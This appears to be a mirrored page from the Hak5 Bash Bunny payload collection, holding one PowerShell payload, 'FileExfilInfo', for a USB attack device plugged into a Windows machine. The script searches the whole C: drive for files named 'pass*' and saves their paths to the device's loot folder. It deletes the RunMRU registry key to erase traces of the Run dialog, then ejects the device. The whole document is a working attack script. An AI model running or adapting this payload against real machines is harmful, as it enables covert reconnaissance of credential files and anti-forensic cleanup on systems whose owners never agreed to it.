mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
36 lines
1.3 KiB
PowerShell
36 lines
1.3 KiB
PowerShell
#Creator: A_SarcasticGuy
|
|
#Title: FileExfilInfo
|
|
#Target: Windows
|
|
|
|
#Check if CapsLock key is enabled
|
|
$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
|
|
|
|
#If true, toggle CapsLock key, to ensure that the script doesn't fail
|
|
if ($caps -eq $true){
|
|
|
|
$key = New-Object -ComObject WScript.Shell
|
|
$key.SendKeys('{CapsLock}')
|
|
}
|
|
|
|
#Get the drive letter
|
|
$n = (gwmi win32_volume -f 'label=''BASHBUNNY''').Name
|
|
|
|
#Create directory in loot folder to store file
|
|
mkdir $n\loot\Exfil\$env:computername
|
|
|
|
#Find files beginning with phrase "pass*" in the directory (and sub-directories) of "C:\" ("pass*" and "C:\" are defaults, and can be changed to suit)
|
|
forfiles /P "C:\" /s /m "pass*" -c "cmd /c echo @isdir @fdate @ftime @path @fsize" >> $n\loot\Exfil\$env:computername\$(get-date -f dd-MM-yyy-hh-mm-ss).txt
|
|
|
|
#Delete registry key to remove run dialog history
|
|
REG delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
|
|
|
|
Sleep 10
|
|
|
|
#Eject Bunny when exfil is completed as search time can vary
|
|
$Eject = New-Object -ComObject Shell.Application
|
|
$Eject.NameSpace(17).ParseName($n).InvokeVerb("Eject")
|
|
|
|
#N.B Bunny will not eject if still in use, and scans can take quite a large amount of time, for example if scanning a full Hard Disk.
|
|
|
|
#Close Powershell process, should it still remain open
|
|
$host.SetShouldExit(0) |